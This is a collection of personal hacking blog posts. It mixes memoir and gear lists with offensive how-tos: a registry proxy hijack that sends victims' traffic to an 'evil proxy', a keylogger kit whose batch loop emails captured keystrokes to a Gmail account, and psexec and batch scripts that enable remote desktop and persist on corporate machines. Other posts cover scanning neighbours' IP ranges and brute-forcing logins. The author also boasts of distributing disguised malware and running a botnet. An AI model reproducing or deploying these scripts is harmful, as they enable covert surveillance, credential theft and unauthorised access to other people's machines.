Everyday Carry PenTest Edition

This is an everyday carry but not in my pockets, in my man-purse, or briefcase as some have taken to calling it. The "bag" in question being a Kenneth Cole Reaction briefcase.

Within that I keep an Apple MacBook Book Air Early 2014 with MacOS Sierra. You may think that's insufficient power but it has proven that the lack of weight and the SSD certainly compensate for anything to be desired. In fact the only thing I noticed after ditching my (Debian) Dell XPS, is that a lost a lot of weight but lost practically no computational power. And further Within is yet another small case, and within that is where the magic lies:

So the tools most notably in here are USB rubber ducky( for quickly injecting malware in hypothetical within reach machines), Yardstick One( for hypothetically jamming wireless signals within it's rating or hypothetically intercepting rolling encryption car fob door opens, and starts), usb SDR( for playing with Software Defined Radio, and not cell signals), Ubertooth(For bluetooth operations), a host of usb fobs, and that concludes one side of the bag.[Most of these can be purchased at Hak5] On the other side of the bag* I have various antennae for the aforementioned devices, an RFID card reader, some blank cards and keychains, and a set of door shims of varying thickness.

Within the briefcase I also have a black tie, because why not. And a mechanical keyboard. The keyboard may seem like overkill but your fingers will thank you, and with the weight loss from upgrading to the apple from the Dell, I don't notice the extra weight.

*Forgot the Turtle Lan Shell

For less potato, but more linux / hacking pics, check out my instagram.

Confessions of a wanna be hacker

All I have ever wanted and strived to be is, a grubby little hacker. Those three words written indelibly in my mind:

grubby little hacker

Always lower case. In fiction they were smart, they were generally physically weaker than their antagonists. Clever won the day though. I became enamored with the idea after the advent of getting my first computer, an IBM PS/1 486 25 Mhz, Both types of floppy drives. A machine, that when it's broken doesn't get mad. You can work on it, and not get yelled at. As long as you don't get angry you can keep trying any solution until it's fixed.

My first experience fiction withstanding with anything even "hacking" related, was when I was young probably mid to late 90s. I needed a fresh install of Windows 95, and I didn't know what I was going to do. I didn't have an install disk from my current computer. And I was telling my friends about my woes and he said no problem he had a copy. His dad had a copy of Windows 95 on diskette. I don't remember the actual number of disks but at like 12 years old, I think I believed there was about 90 of them. But seriously installing windows 95 from diskette was an all day experience. It took like 8 hours because the disks were slow and every so often you would have to change one out. I wouldn't see a windows disk with a holograph on it for another 10 years. I think once we got installed we hooked up a null modem and played doom or something. Cause you know, there ain't no party like null modem lan party.*

About this same time I had my for dip into programming, thanks to a seriously outdated computer lab. It was the 90s, but they had a complete lab of full working Apple IIe's. They were awesome. I learned how to type in 6th grade and Basic in 7th. By 8th they replaced the entire lab with the multicolored mac's. But I knew after watching the cheesy videos about "Don't copy that floppy" and various other warnings of hackerly things in the class. That's what I waned. To own the machine.

We had the internet briefly at my home for a while, but my dad decided he didn't want to pay for it anymore. I ended up shoulder surfing dial up account usernames and passwords, from anyone's house that would let me near there computer. So I still had internet. At the time there was a free service called Juno that allowed you to connect to there service and download email then immediately disconnect. I used this as a cover for my parents if they ever picked up the phone and heard the modem cranking away.

In 1999 I installed my first linux install. I stole the cd out of the back of a book, from booksamillion...you know cause it's difficult to download an os over dialup. I didn't know how much different my life would be. My mentor and friend at the time had told me about linux and though he had some enthusiasm at first, he would eventually move to windows 2000. I would as well but I always kept a frankenbox with linux on it, I knew it was going to be important. And my best friend at the time whenever I was working on it, or trying to learn my first scripting language (perl), he would call it "fake work."

In high school, I was a decent student, but I never did homework. I kept a more or less A/B average :). At night I was sleeping 3 maybe 4 hours a night either reading novels, tech manuals or working with the computer. In High School, I got in trouble a bit more than I care to admit. One day I had written something the administration didn't like, and they informed me they were going to call my parents, so for the remainder of the week I tied up the phone with the modem. My principle asked me if I told my parents about it, I said I had and nothing else came of it.

The towers came down, while I was in programming class. In the very same programming a class a group of friends and I shoulder surfed the Teacher's password. They all got in trouble for using the password at their desks. My machine showed no such usage.

High school ended. There was a break up with a girl, and a partion magic accident. I decided I wasn't using computers anymore. My personal life got dark. A theme of things to come.

Two years after that decision, my dad told me to "get my shit together" or else. And suggested I start going to school somewhere. I briefly looked into medical assisting. Ultimately deciding maybe I have to get back into computers again. There was a computer networking and security program, and I thought, security, and

grubby little hacker

echoed in my head again. During and after school my career would take off. In my downtime I wrote a piece of malware that I distributed as a credit card number generator(I still can't believe people downloaded and installed this thing). And created a small bot net, I mostly used to harass the installers of the program with the vbscript voice on windows.

I can remember the first time I used metasploit to solve an actual real problem at a job. And I can remember in between jobs being poor and cracking wifi networks just for internet access. Shortly after I would write webscrapers, for a semi-reputable company wanting to fill there databases with other peoples data. And then managing cloud servers for high availability sites, in the mid to late aughts. And then doing various dev and linux admin roles. Still toiling away after hours on various projects including shells, or what not.

Am I hacker, did I become what I wanted? It doesn't really matter what anyone says I don't think I'll ever believe it, I either have the worst case of impostor's syndrome ever, or I will just keep striving for the unobtainable.

You know what, I don't think I've ever written an exploit...I think I'll go do that.

*To be honest I don't think we got doom working, but we did get a file transfer going, much to the regret of FM radio listeners in a block radius.

Bitcoins bitcoins bitcoins

I'm going to defcon soon and it seem that there is only one lectrure on bitcoins. This saddens me. I use Mt.Gox to do all my bitcoin transactions. Which is to say convert my bitcoins into DOLLA DOLLA DOLLA bills. I am somewhat proud and somewhat ashamed to admit I am a bitcoin miner. As of right now I don't have any winning tips for you on how to be a miner. I will however introduce you to them.

Go here if you want to read the real version of what they are and how they work, instead of my dramaticized half fictional account: http://en.wikipedia.org/wiki/Bitcoin

Bitcoins are a currency based on cryptography, using various mathmatics to prevent shenanigans. Bitcoin miners, people who provide proof of work, for the bitcoins, can actually aquire bitcoins. And bitcoins can be turned into dolla dolla dolla bills. So to do this proof of work you rent out your proccessor, ok really you need to rent out your graphics card: ( https://en.bitcoin.it/wiki/Mining_hardware_comparison )

Woah Woah Woah, why are all the cards ATI..., well it turns out the function mostly used is sha256 and guess what, on ATI cards, there is a specific asm function for that....WAY TO GO Amd.


So get a client to cruch this cryptography and start cracking away. Use poclbm if you got graphics cards on the brain( https://github.com/m0mchil/poclbm ). Now if you want to use CPU's which is by all accounts is at least 50 some odd times slower you can still go for it, use RPCMiner for mac, and minerd for linux. Join a mining pool like deepbit and start crackalackin a way.

If you join a mining pool the rewards can come very fast.......but with very fast, come very small rewards, lol.

CAVEATS:
OH AND ONE HUGE CAVEAT. This will eat electricity like a mother fucker. No joke, if you live in (Worse case US scenario ) Hawaii, have two rigs, with 2 graphics cards a piece your electric bill can go up over 200 dollars what it normally is. LOl that math is bad and terrible. For real math ( http://www.pcper.com/reviews/Graphics-Cards/Bitcoin-Mining-Update-Power-Usage-Costs-Across-United-States ). This also makes crunching solely on cpus, pretty much a no gain death trap, by my understanding.

Who's going to defcon this year?

I AM WOOT!


If you want to meet up with me at sometime let me know.

ZOMG My sign is on the internet.

DSC_0155, originally uploaded by jasonRmoore.

My sign at podcamp Nashville 09. This is in someone elses flickr and not just my usual self promotional bullshit.

The Lazy Hacker Sniffing SSL traffic, maybe part 1:

So this is the first time I am posting, and haven't finished the project, so I am not certain if it works, I'll tell you in part 2. Anyways your probably thinking ssl is encrypted so how are you going to do this. Well we aren't going to break encryption. Instead we are going to send all there traffic to our evil proxy, where it will get any certs from. And our proxy will gobble up the certs it's supposed to get and hand the client machine a cert it made itself. So how are we going to do that, well we need to touch the client computer and do a registry edit. There are lots of languages you can do one in, I am just going to do this one in bat for times sake. It requires one .reg file which should contain:

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable"=dword:00000001
"ProxyServer"="myevilproxyserver.com"

And we should name it proxy.reg. And we will make one .bat file which will contain:

regedit.exe /s proxy.reg

You can also do this with the reg command and a hundred other ways but this is how I did it. Ok so that's all you need to do on the client machine, next week some time I will show you how to build the server that will eat this poor soul's traffic

Gentleman's MalWare license

With my blog entry about my bot I introduced the Gentleman's MalWare license, which is to say something very similar to the GPL or in equivalent to the creative commons license shown below.

This work is licensed under a Creative Commons Attribution-Noncommercial-Share Alike 3.0 United States License.

HackForums.net was rooted and 9unkz0r IRC went down

On the 14th hackforums.net was rooted, through what the administrator said was an old script with an easy exploit. They were able to run a shell according to the administrator. Hackertopsites.com which is run on the same box had links to the attackers site c0rrupt.org/side. Not that long after irc.9unkz0r.com came under a ddos attack by a user with the handle uid0. It is not known whether these are related. The IRC server is still being "quarantined" by routing the majority of packets to /dev/null. However some users are able to log on, if you just happen to be one of the routes that is still up. It is unknown how long this outage will last. I also received a 514 message e-mail bomb. Luckily gmail grouped them all together.

AS OF SEPTEMBER 30TH 2009 THERE IS NO HACKFORUMS, in leiu please go to http://malvager.com

Thoughts about hacking consumer grade wireless "routers".

People call those little things you connect to your cable or dsl modem wireless routers, but that's not really what they are. So what are they? They are part switch, part WAP(wireless access point), and part router. So you have four switch ports, and those are on one side of the routing and one port is for the internet which is on the other side of the routing. The WAP(Wireless access point) part is on the same side of the routing as the 4 switch ports, so all of that is behind the "router" which is doing Network Address Translation or NAT, which is actually what is protecting you. Well really we call it NAT but it's not really NAT, it's actually PAT or Port address translation. So your hiding behind a single IP and only if your computer makes connections to the outside can connections from the outside come in.

Your Network +++++++++++++++++++++++++++++++++++Intarweb



**Yes the router has two IP's, that's how routing works silly**
**And x.x.x.x is an IP assigned by your ISP**

I was asked how to get through, NAT which is to say PAT, which is a layer of security the router inherently gives it's users.

How do we break it so that connections from the outside can get in without having the internal network make the first move?

So the first thing isn't a hack, it's a feature of these "routers". It's called port forwarding and what it does, is it takes a port on a single computer on the internal network and puts that port directly on the internet. For example you start a home business running a website to sell candid shots of your girlfriend to the internet at large, or maybe you just want to have the candid shots and reap the benifits of having ads on the page selling the for 5 cents a click, well thats besides the point I don't care how your exploiting your girlfriend it's just important it gets done. Anyways so you have your site hosted on your home computer, you will have to forward that port to your computer with the webserver running on it. If you forward that port on your router to your computer, then that port on the home pc is exposed to the world and all can get to it. If anything is port forwarded on your router, and that software is vulnerable to an exploit, like the webserver you are using, evil hackers can break that software and get into your computer, or lets say you had 3389(RDP) port forwarded on your windows machine so that you could remote into it from the road, you know to add more pics of your girl, or other girls who you had told you worked for Girls gone wild and were wondering if they would like to audition for a paying part in the new magazine you aren't heading up. Well they could use TSGRIND or something else to brute force passwords.

So the evil hacker found your router and doesn't want to pay for your girl friends pics. The first thing he is going to do is a port scan probably with nmap and probably something like this:

nmap x.x.x.x -P0


**Being that x.x.x.x is your routers external IP**

**-P0 is saying don't send ping to check if the box is alive this is because most consumer grade wireless "routers" don't care about ICMP, becuase well I don't know it's really stupid, there used to be called this thing called ping of death, that could knock machines down, but all modern oses and these consumer grade devices are patched against this so I have no idea why they do this, if you ask me it's stupid becuase ICMP is a helpful troubleshooting tool. And proof that smart people still use it, ping google, you will typically get 3 out of four of your ICMP packets back, why don't you get one back, hell if I know I have some thoughts but I don't work for google and this post isn't about that. Also that is an capital p and a zero not a capital o.**

Ok so this nmap may return with some open ports, for the most part if the ports are described as open, they are probably forwarded. So that gives you, errr the evil hacker his current points of interest. Then if there was software behind those ports he would try to break it. Ok moving on...

How can I get in if all ports are blocked. Well if the router software itself is vulnerable I can use an exploit to break into it, and then use it to port forward inside of your network, or use it as a launching point for my nefarious deeds. How does the evil hacker do this....beyond the scope of this post.

Next issue, if you download any malware it can run on your local machine and then make connections to other machines on the intarweb that can then control or alter your machine. NAT obviously can't protect you from your stupidity. Don't download garbage or your fucked.

So the evil hacker knows where you live. Oh I know scary....well you shouldn't have filled out the domain information for your girl friends bestiality porn website accurately hackers use that stuff to figure shit like that out. So he drives to your house and he sits out side, well stupidly you left your wireless signal unencrypted, or you only used WEP...or smartly you used WPA, however your passphrase was a dictionary word....retard.

So he cracked your shit. Well why do you care. Because a very stupid company named Microsoft, in partnership with HP, made a protocol called SSDP. Why is SSDP stupid? Wiki says:

Quote:SSDP provides a mechanism which network clients can use to discover network services. Clients can use SSDP with little or no static configuration.

Wtf m8? Devices and software on your network CAN MAKE CHANGES TO YOUR FUCKING ROUTER. Meaning anyone who knows how to use ssdp can make a program that if launched on the inside of your network, whether from your machine or a malicious machine that is on your wireless network, can configure your router to portforward to whatever it chooses.

Thanks M$ we really love you.

Ok now that that's over, how do you guys like this style of post?

On this the day we elect our leader.

Diebold makes shitty machines, they always have, and they won't open the code. But they like open standards for ATMs? You can find what voting machines your state used here. In KY they use Hart InterCivic machines, but they Diebold and another voting machine company still have vulnerabilities. I was going to go on a diatribe about what I thought this means, but I think you guys should pull your own conclusions about voting, maybe I will post my opinion tomorrow.

Big boy hacking, or The anatomy of the vulnerabilities on a network from a layer 2 and beyond perspective.

Layer2 is really the sweetspot, I know on any network when I get there, I have them. Okay so what's vulnerable on a network you have layer2 access to? EVERYTHING. Switches, routers, firewalls, "security appliances", client computers, servers, hell printers, some printers have fucking active directory users! I can't tell you how many times I have went into a place and told the sys admin that the switches had a defualt password still on them and he said "Those switches have an interface?"
Ignorance is how you win the war. The Sys Admins ignorance vs your knowldege.
There are times to be a pirate and times to be a ninja, this is a ninja time. Stealth, use it.Ok so you want a layout of the network, so....hey fuckin' stop it, I saw you fucking grabbing that AngryIP scanner, no, put that down. IP Scans will set of a well configured IDS or IPS. So let's be a little more subtle, let's do an arp scan and only five machines at a time. With something like cain it will try and give you the name of the company that the mac address is from so you can try to seprate the computers from switches and printers and the like. Ok now if you have done your research on this place you need to ask yourself, how many computers should they have, compare this to your scan. If your scan is way low they may spread themselves over multiple subnets and or vlans. Ok so always have a default password list with you. Your easiest targets on the network are the traffic itself and the device admins don't think about ie switches and printers. So if you can make yourself a trunk port on a switch you don't even have to arp poision the damn thing to get all those sweet nuggety passwords. If you just want to do a denial of service you can just put the switch in a loop. There are a host of switch attacks. Check out vlan hopping. Printers have buffer overflows just like anything else.
So this tutorial supposes you have layer2 access, well if you have physical access to one of the machines you could use any number of usb tricks to steal network credentials. But if you don't it's going to be hard becuase active directory uses kerb5 to protect it's passwords, your best bet is to look for an nt4 machine that just uses lanman. EVERY NETWORK has an NT4 machine, it's just in the closet and nobody remembers it until some archaic piece of accounting software breaks. So if you can just poision that guy, and the computers it seems to be talking to(probably accounting machines or a server). Also just observe as much of the infrastructure as you can. It will teach a lot. Well there is a lot more like what to do with routers / servers / "security devices", but really this is more about the take 'em down low where they don't see.
And I bet you thought I was going to talk about the new iphone today.

nmap lesson 2 (begginer)

Ok so you know how to nmap:
nmap 192.168.1.1
and you know how to nmap –P0 –O
nmap 192.168.1.1 –P0 –O
So now you want to know more. Ok so let’s find out your IP address. If you are in windows do an ipconfig if you are in *nix do a ifconfig. Ok so typically your behind a wireless router or something if you have cable or dsl. Or if your range is in between any of these:
10.0.0.0 to 10.255.255.255
172.16.0.0 to 172.31.255.255
192.168.0.0 to 192.168.255.255
That means you have a private IP address and that your router navigates the internet for you using NAT(PAT technically). So you need to find your publicly routable address. To find this goto ipchicken.com and it will tell you your external IP. So let’s say your IP is 68.52.155.53. Ok take this address and run it through arin.net or ripe.net if you are in Europe or afrinic if you are in Africa, etc..
Ok so my address gives me two, possible selections for Comcast:
Comcast Cable Communications, Inc. JUMPSTART-1 (NET-68-32-0-0-1)
68.32.0.0 - 68.63.255.255
Comcast Cable Communications, Inc. NASHVILLE-3 (NET-68-52-128-0-1)
68.52.128.0 - 68.52.159.255

I am going to choose the Nashville one because that is where I am at and it is a smaller range.
So I want to narrow my range down as much as possible so I have less results to look at. So I want to scan IP’s that are near mine, because most likely those are other Comcast customers and potentially even my neighbors. So I want to scan the range 68.52.155.x . x is going to stand for 0 through 255 and I also want to output this to a text file so that I can review it later, because it is going to take a long time. So here is my command:
nmap 68.52.155.0/24 –P0 –O –oN bob.txt
This well output everything to bob.txt in the current directory.
Next Lesson, interpreting ports.

Hacking Flickr metric "Intrestingness"

The best blog I have seen on this so far is the SEO of the sea. And the best part of that is describing the patent:

Interestingness rank is based in part on:

* The quantity of user-entered metadata concerning the media object,
* The number of users who have assigned metadata to the media object,
* An access pattern related to the media object,
* A lapse of time related to the media object, and/or;
* On the relevance of metadata to the media object.
* Whether the media contains undesirable content such as obscene imagery or promotions of a competitor’s product.

Another good one, is all about content blog. So the one place these two fundamentally disagree is the focus on WHAT USERS look at your flickr.

Ok so I have been doing some really "casual" interesting tests, but I haven't done anything hardcore. However, I am ready to, I am going to start building a python tool, using beej's flickr api and see if I can't narrow down a little better and give a little more clarity to the metric. I don't know if I will be able to get any good numbers out of this but I will learn something about the metric and have a good time.

Easy System Administrator Security Blunders

Fatal System Administrator Mistakes
System Administration can be a stressful job and tedious. This leads admins who are either poorly educated or over work to make some very simple mistakes out of convenience, franticness, or frustration.

In a large enough environment, most companies take use of Active Directory. This cuts down on the amount of work a sys admin has to do for shared resources through centralized authentication. Which means most boxes in the corporate environment have two administrators(3 if you count the domain admin). One is the normal user who comes in and authenticates through AD transparently on his/her box. The other is the local Administrator of the box that was used to set up the machine, most sys admins do not remove or disable this account. And most sys admins use the same password for this account consistently, and it's usually not a really sophisticated password.

Consider looking at:
http://ophcrack.sourceforge.net/
http://www.mininova.org/tor/183001
http://wiki.hak5.org/wiki/USB_Hacksaw
**Can't vouch for the torrent sites**


In a small to medium business, some times there is a crunch for budget and either the IT guy is really crunched for time, or there is no IT guy so the responsibility of the web server falls to either a web developer or a web designer. Most of these guys know what they are doing but there's a portion of them, that when they here security they think I don't have any mySQL injection points on my webpage, not maybe I shouldn't just set the webserver outside the firewall. I lot of web guys put servers outside of firewalls, or just forward enough ports to make the firewall ineffective, because it makes there job easier. Now a hardened FreeBSD box sitting outside a firewall, is on thing, but a Windows server 2000 box with the majority of ports turned to the internet is quite another, particularly if that box is doing more than web serving. Being that it's a web server there is probably a reluctance to update becuase of down time as well.

Consider looking at:
http://www.metasploit.com/
Core Impact(If someone finds a torrent for this let me know so I can post it)
Canvas(If someone finds a torrent for this let me know so I can post it)
**Can't vouch for torrent sites**

Not training employees to understand when it is ok to disclose there password and when not to can be a problem as well. We have all heard the example of the sticky note with the password right by the computer, however other helpfuls in social engineering are just reading the site and looking at the staff directory. Maybe visit the site to see how the physical security is, imagine if there was an rj45 port exposed, just hook up and set a small ap behind a chair and your in. And if you are into it, go ahead and do some trashing, just grab some bags from there dumpster see if anyone threw out one of those sticky notes you here so much about.

Consider:
Visiting Web site
Visiting Physical Site

So there's three mistakes you might look for that an overworked or underworking IT pro might make.

Community Building

I interviewed a buddy of mine who runs therabbithole.ws, we met on hackforums.net, and I knew immediately I was going to like this guy. He started the rabbithole shortly after I met him(to my understanding :) ). And he has done such an excellent job community building I wanted to ask him about it so without further ado, haxor.much:

What are your future planned projects, elaborate if you can.

I have amazing things planned out for TRH and its members. The staff and I are going to implement some sort of downloading section and we are going to get some streaming hacking videos on a separate forum page. Also, I am making a WAP version of the forums so that members can view it from their phone. So many projects....

What has been your hardest struggle with getting therabbithole.ws community together and keeping them together?

I would have to say immature members who strive for a power position. Its something every admin is going to have to go through, thats why you get yourself a good forum team to answer those questions so you can keep the site running.

When you think of therabbithole.ws community do you think of them as a tight group? Or are they a loose group with their own alliances and enemies?

I think that the family ambiance at the forums is pretty high for most members. There are of course others who are very active on other boards and visit TRH from time to time but all in all, we are pretty tight.

What's your favorite website that you have not authored?

Hmmm this is a tough one. Any intelligent hacker would say Google, although milw0rm is right up there too.

I don't hear about f33r.com or infinityandthevoid, how are they doing?

I killed f33r.com (my old proxy) because it was literally eating my bandwidth. The only thing I kept was the email address @f33r.com. As for infinityandthevoid, TRH has taken up a lot of my time and I haven't gotten a chance to really post some things on there.

What's your typical day like?

Wake up, then take a shower and such.
Then I usually squeeze in about 30 minutes of screen time before heading off to school. After my studies I could clock in anywhere from 2 to 7 hours on TRH and other sites. On the weekends, the only person who can get me away from my screen is my girlfriend. I have an addiction t(*_*t)

Do you write your own exploits, if so what language?

I used to write some exploits with a small hacker group that is unfortunately nonexistent at the time. We were called Immortal.Hackers or -[iHs]- for short. We would usually code in Python.

What's your main machine stats? How many machines do you run?

At home, I have 2 desktops running Vista and Ubuntu and my laptop running a modded version of XP. They all have 2Gb+ RAM, AMD Athalon 64 x2 processors. The machine I use the most would be the Vista desktop seeing as thats where TRH is backed up every couple of hours :) I am also setting up a VM for the future Wargames on TRH.

Favorite non-computer related hobby?
Either reading or playing rugby. I like violent sports because they can really bring out the stress you've built up in the day. Reading because I don't plan on staying ignorant forever. Wait. Does it count if I read books on hacking?

Do you have anything to say to aspiring noobs in general?
You have to want to learn. Things won't be spoonfed to you in the hacking world. You can get some great guidance but no one will hack for you. You have to read and try to learn as much as you can on any given subject. The more you read, the better you will become. A year ago I didn't know what a hash was. Now I can hack servers and deface webpages with ease. Its all about your will to learn.

Also, don't let yourself be pushed around by other hackers. If you do, push right back. You have to be strong in the online world.

A link everyone should already have

http://www.phenoelit-us.org/dpl/dpl.html

Default password list. Go to their site, read about phenoelit, then get that list in your memory.

I registered a channel in IRC

I registered an IRC channel on the chat4all.org servers:
http://www.chat4all.org/

You will have to point your client at them, the name of the room is #computer-punks.
Their isn't a lot of traffic right now but maybe in the future. I guess I should, say it's just me and one other guy.

Finding and Executing wireless intruders

Finding and executing Wireless intruders.

Finding the intruder.

The easiest way to check is to go into your router and check the dhcp clients table and see what ip’s on your network are being used. Routers can be very different from one another to get to yours type ipconfig in the command prompt your router will be at the address that is the default gateway. Type that address in your address bar of your web browser(this works assuming you have a consumer grade router in your house not like a cisco 2611). A login screen should pop up. If you do not know your router’s username and password find it on the default password list

https://www.bestvpn.com/default-router-login-details/

Some people will appreciate this list more than othersJ. On a Linksys you will click the status button, and then local network and then dhcp client table list. If you don’t have control of the router on your network you can use angryIP to scan your network for IP’s, typically your range will be 192.168.1.0 to 192.168.1.254. Or you can use an arp scan tool like cain and abel(oxid.it). Anyway wants you have one of these lists eliminate the IP’s that belong to your devices. If you can eliminate all the ip’s you have no intruder if you can not, you may have an intruder.

Eliminating the intruder.

First and easiest thing to do is see if he has simple file sharing enabled. To do this hit start->run then type \\ipaddress and yes you do have to have the right slashes. A good way to think about it is \ is a windows slash and / is a *nix slash. Ok let’s say that doesn’t bring up any shares or times out. Next we want to nmap the target.

http://nmap.org/download.html

After the install use the cmd line interface to nmap by hitting start->run then typing cmd. Now you are at the command line and you want to use nmap so type:

Nmap targetip –P0 –O

That’s a p and a zero and then the second one is an uppercase letter o. It means it won’t ping first and it will try to id the os as well. Ports you want to be open are 22(for ssh on *nix comps), 3389(rdp on windows comps), or any of the vnc ports. Hydra THC can brute force ssh and tsgrind can brute force RDP.

http://www.hammerofgod.com/download.html

But remember brute force is just brute force. It’s really unskillful and oafish. You probably would rather try something more subtle like sniffing.

Please look at one of my earlier posts on password sniffing.

So by now you have enough knowledge to own the box.

You may also just want to enumerate data on your victim. If you want you could just boot him from the network by enabling 802.1x on your router.

Key logging made easy.

You will need klogger from:

http://ntsecurity.nu/toolbox/klogger/

You will need a gmail account.

You will need blat from:

http://sourceforge.net/project/showfiles.php?group_id=81910

And Nircmd:

http://www.nirsoft.net/utils/nircmd.html

Ok put everything in a single directory on a flash drive, or a cd. Just a directory you can drag onto the target computer.

You should have blat.dll blat.exe blat.obj klogger and nircmd.

Ok now we are going to make two .bat files.

One is start.bat and the executable for the program:

nircmd.exe execmd CALL klogger
nircmd.exe execmd CALL go.bat

The next one is go.bat and you will need to do some editing to it.

goto THREE
:THREE
ping 127.0.0.1 -n 100 -w 1000> nul
REM the ping acts as a wait
Blat klogger.txt -to bsdpunk@gmail.com -u bsdpunk@gmail.com -p password -f
bsdpunk@gmail.com -server gsmtp183.google.com
REM Please don’t use my email address use your own and your own password etc.
goto THREE

You should now have blat.dll blat.exe blat.obj go.bat klogger nircmd and start.bat.

Just drag your folder with these files to the target computer and run start.bat.


EDIT You will need to use a different server as gsmtp183.google.com is no longer
EDIT Publicly Availiable

Accessing WinXP Pro computers in a corporate environment.

Accessing WinXP Pro computers in a corporate environment.

In most corporate environments all the XP boxes are on a domain, which means their credentials are just flying around all over. Let’s say you got some windows passwords and cracked them, from my last tutorial.

Or let’s say you got some cleartext passwords from some http stuff and you think that those passwords are the same as the windows passwords.

Typically on corporate machines RDP is enabled but if it isn’t then you can use psexec to get your head in the door.

http://www.microsoft.com/technet/sysinternals/security/psexec.mspx

Open the cmd prompt by hitting start run, then typing cmd then hitting enter.

Type this into the cmd prompt(make sure you are in the directory that psexec is in when you do this or add psexec to the system path):

psexec \\machinename –u username cmd

It will prompt you for a password which you have conveniently commandeered. Oh and username should be the username not the word. This will start a command prompt on your machine that is actually operating from the other machine. So you have \\machinename ‘s cmd prompt open. You can do any of your normal command prompt stuff from here. PSEXEC has an option for uploading a file when you use it but it is a little tricky. What I do is use the net command to map a drive to your computer from the other computer. Like so:

Net use r: \\breadstick\public /persistant:no

Will map the drive to the computer breadstick’s shared folder named public. So now you can just type.(Remember this is in the other comps cmd not your own)

R:

to access it.

So you can run a silent install of vnc for some sweet gui action or if you know no one is actually in front of the computer you can create these three bat files. And run first.bat.

Make three .bat files in the same directory on a thumb drive:

first.bat

code:

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
mkdir c:\batter
copy second.bat c:\batter
copy third.bat c:\batter
cd %USERPROFILE%\Start Menu\programs\Startup\start.bat
copy c:\batter\second.bat start.bat
shutdown -r -t 0

second.bat

code:

netsh firewall set portopening tcp 3389 "RemoteDesktop"
cd c:\batter
third.bat

third.bat

code:

cd %USERPROFILE%\Start Menu\programs\Startup\
del start.bat


This will enable remote desktop on that machine so that you may remote into it.